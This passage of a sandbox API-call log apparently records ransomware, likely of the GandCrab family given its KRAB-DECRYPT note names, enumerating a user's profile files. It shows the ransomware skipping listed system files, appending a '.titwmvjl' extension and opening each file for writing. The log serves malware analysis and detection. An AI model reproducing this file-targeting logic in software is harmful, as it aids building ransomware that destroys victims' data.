lpString2=".titwmvjl") returned -1 [0093.710] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.711] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG2") returned 37 [0093.711] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG2") returned 37 [0093.711] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="desktop.ini") returned 1 [0093.711] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="autorun.inf") returned 1 [0093.711] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="ntuser.dat") returned 1 [0093.711] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="iconcache.db") returned 1 [0093.711] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="bootsect.bak") returned 1 [0093.711] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="boot.ini") returned 1 [0093.711] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="ntuser.dat.log") returned 1 [0093.711] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="thumbs.db") returned -1 [0093.711] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0093.711] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0093.711] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="KRAB-DECRYPT.html") returned 1 [0093.711] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="CRAB-DECRYPT.html") returned 1 [0093.711] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="KRAB-DECRYPT.txt") returned 1 [0093.711] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.711] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="ntldr") returned 1 [0093.711] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="NTDETECT.COM") returned 1 [0093.711] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="Bootfont.bin") returned 1 [0093.711] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG2") returned 37 [0093.711] lstrlenW (lpString=".LOG2") returned 5 [0093.711] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.711] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".LOG2 ") returned 6 [0093.711] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.712] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.712] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\ntuser.dat.LOG2" (normalized: "c:\\users\\ciihmnxmn6ps\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0093.712] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.712] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.712] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0093.712] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2=".") returned 1 [0093.712] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="..") returned 1 [0093.712] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf") returned="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf" [0093.712] lstrlenW (lpString=".titwmvjl") returned 9 [0093.713] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf") returned 77 [0093.713] VirtualAlloc (lpAddress=0x0, dwSize=0xda, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.713] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf.titwmvjl") returned 86 [0093.713] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf") returned 77 [0093.713] lstrlenW (lpString=".blf") returned 4 [0093.713] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.713] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".blf ") returned 5 [0093.713] lstrcmpiW (lpString1=".blf", lpString2=".titwmvjl") returned -1 [0093.713] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.713] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf") returned 77 [0093.713] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf") returned 77 [0093.713] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="desktop.ini") returned 1 [0093.713] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="autorun.inf") returned 1 [0093.713] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="ntuser.dat") returned 1 [0093.714] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="iconcache.db") returned 1 [0093.714] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="bootsect.bak") returned 1 [0093.714] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="boot.ini") returned 1 [0093.714] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="ntuser.dat.log") returned 1 [0093.714] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="thumbs.db") returned -1 [0093.714] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0093.714] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0093.714] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="KRAB-DECRYPT.html") returned 1 [0093.714] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="CRAB-DECRYPT.html") returned 1 [0093.714] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="KRAB-DECRYPT.txt") returned 1 [0093.714] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.714] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="ntldr") returned 1 [0093.714] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="NTDETECT.COM") returned 1 [0093.714] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="Bootfont.bin") returned 1 [0093.714] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf") returned 77 [0093.714] lstrlenW (lpString=".blf") returned 4 [0093.714] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.714] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".blf ") returned 5 [0093.714] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.714] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.714] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf" (normalized: "c:\\users\\ciihmnxmn6ps\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0093.715] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.715] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.715] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0093.715] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1 [0093.715] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1 [0093.716] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms") returned="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms" [0093.716] lstrlenW (lpString=".titwmvjl") returned 9 [0093.716] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms") returned 114 [0093.716] VirtualAlloc (lpAddress=0x0, dwSize=0x124, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.716] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms.titwmvjl") returned 123 [0093.716] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms") returned 114 [0093.716] lstrlenW (lpString=".regtrans-ms") returned 12 [0093.716] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.716] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".regtrans-ms ") returned 13 [0093.716] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".titwmvjl") returned -1 [0093.716] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.717] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms") returned 114 [0093.717] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms") returned 114 [0093.717] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="desktop.ini") returned 1 [0093.717] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="autorun.inf") returned 1 [0093.717] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="ntuser.dat") returned 1 [0093.717] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="iconcache.db") returned 1 [0093.717] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="bootsect.bak") returned 1 [0093.717] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="boot.ini") returned 1 [0093.717] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="ntuser.dat.log") returned 1 [0093.717] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="thumbs.db") returned -1 [0093.717] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0093.717] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0093.717] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="KRAB-DECRYPT.html") returned 1 [0093.717] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="CRAB-DECRYPT.html") returned 1 [0093.717] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="KRAB-DECRYPT.txt") returned 1 [0093.717] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.717] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="ntldr") returned 1 [0093.717] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="NTDETECT.COM") returned 1 [0093.717] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="Bootfont.bin") returned 1 [0093.717] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms") returned 114 [0093.717] lstrlenW (lpString=".regtrans-ms") returned 12 [0093.717] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.717] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".regtrans-ms ") returned 13 [0093.717] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.717] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.717] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\ciihmnxmn6ps\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0093.718] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.718] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.718] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0093.718] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1 [0093.718] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1 [0093.718] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms") returned="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms" [0093.718] lstrlenW (lpString=".titwmvjl") returned 9 [0093.718] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms") returned 114 [0093.718] VirtualAlloc (lpAddress=0x0, dwSize=0x124, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.718] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms.titwmvjl") returned 123 [0093.718] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms") returned 114 [0093.718] lstrlenW (lpString=".regtrans-ms") returned 12 [0093.719] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.719] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".regtrans-ms ") returned 13 [0093.719] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".titwmvjl") returned -1 [0093.719] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.719] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms") returned 114 [0093.719] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms") returned 114 [0093.719] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="desktop.ini") returned 1 [0093.719] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="autorun.inf") returned 1 [0093.719] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="ntuser.dat") returned 1 [0093.719] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="iconcache.db") returned 1 [0093.719] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="bootsect.bak") returned 1 [0093.719] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="boot.ini") returned 1 [0093.719] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="ntuser.dat.log") returned 1 [0093.719] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="thumbs.db") returned -1 [0093.719] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0093.719] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0093.719] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="KRAB-DECRYPT.html") returned 1 [0093.719] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="CRAB-DECRYPT.html") returned 1 [0093.719] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="KRAB-DECRYPT.txt") returned 1 [0093.719] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.719] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="ntldr") returned 1 [0093.719] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="NTDETECT.COM") returned 1 [0093.719] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="Bootfont.bin") returned 1 [0093.719] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms") returned 114 [0093.719] lstrlenW (lpString=".regtrans-ms") returned 12 [0093.719] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.720] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".regtrans-ms ") returned 13 [0093.720] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.720] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.720] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\ciihmnxmn6ps\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0093.720] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.720] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.721] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0093.721] lstrcmpW (lpString1="ntuser.ini", lpString2=".") returned 1 [0093.721] lstrcmpW (lpString1="ntuser.ini", lpString2="..") returned 1 [0093.721] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="ntuser.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\ntuser.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\ntuser.ini" [0093.721] lstrlenW (lpString=".titwmvjl") returned 9 [0093.721] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.ini") returned 32 [0093.721] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.721] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\ntuser.ini.titwmvjl") returned 41 [0093.721] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.ini") returned 32 [0093.721] lstrlenW (lpString=".ini") returned 4 [0093.721] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.721] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0093.721] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0093.721] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.722] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.ini") returned 32 [0093.722] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.ini") returned 32 [0093.722] lstrcmpiW (lpString1="ntuser.ini", lpString2="desktop.ini") returned 1 [0093.722] lstrcmpiW (lpString1="ntuser.ini", lpString2="autorun.inf") returned 1 [0093.722] lstrcmpiW (lpString1="ntuser.ini", lpString2="ntuser.dat") returned 1 [0093.722] lstrcmpiW (lpString1="ntuser.ini", lpString2="iconcache.db") returned 1 [0093.722] lstrcmpiW (lpString1="ntuser.ini", lpString2="bootsect.bak") returned 1 [0093.722] lstrcmpiW (lpString1="ntuser.ini", lpString2="boot.ini") returned 1 [0093.722] lstrcmpiW (lpString1="ntuser.ini", lpString2="ntuser.dat.log") returned 1 [0093.722] lstrcmpiW (lpString1="ntuser.ini", lpString2="thumbs.db") returned -1 [0093.722] lstrcmpiW (lpString1="ntuser.ini", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0093.722] lstrcmpiW (lpString1="ntuser.ini", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0093.722] lstrcmpiW (lpString1="ntuser.ini", lpString2="KRAB-DECRYPT.html") returned 1 [0093.722] lstrcmpiW (lpString1="ntuser.ini", lpString2="CRAB-DECRYPT.html") returned 1 [0093.722] lstrcmpiW (lpString1="ntuser.ini", lpString2="KRAB-DECRYPT.txt") returned 1 [0093.722] lstrcmpiW (lpString1="ntuser.ini", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.722] lstrcmpiW (lpString1="ntuser.ini", lpString2="ntldr") returned 1 [0093.722] lstrcmpiW (lpString1="ntuser.ini", lpString2="NTDETECT.COM") returned 1 [0093.722] lstrcmpiW (lpString1="ntuser.ini", lpString2="Bootfont.bin") returned 1 [0093.722] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\ntuser.ini") returned 32 [0093.722] lstrlenW (lpString=".ini") returned 4 [0093.722] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.722] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".ini ") returned 5 [0093.722] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.723] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.723] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\ntuser.ini" (normalized: "c:\\users\\ciihmnxmn6ps\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 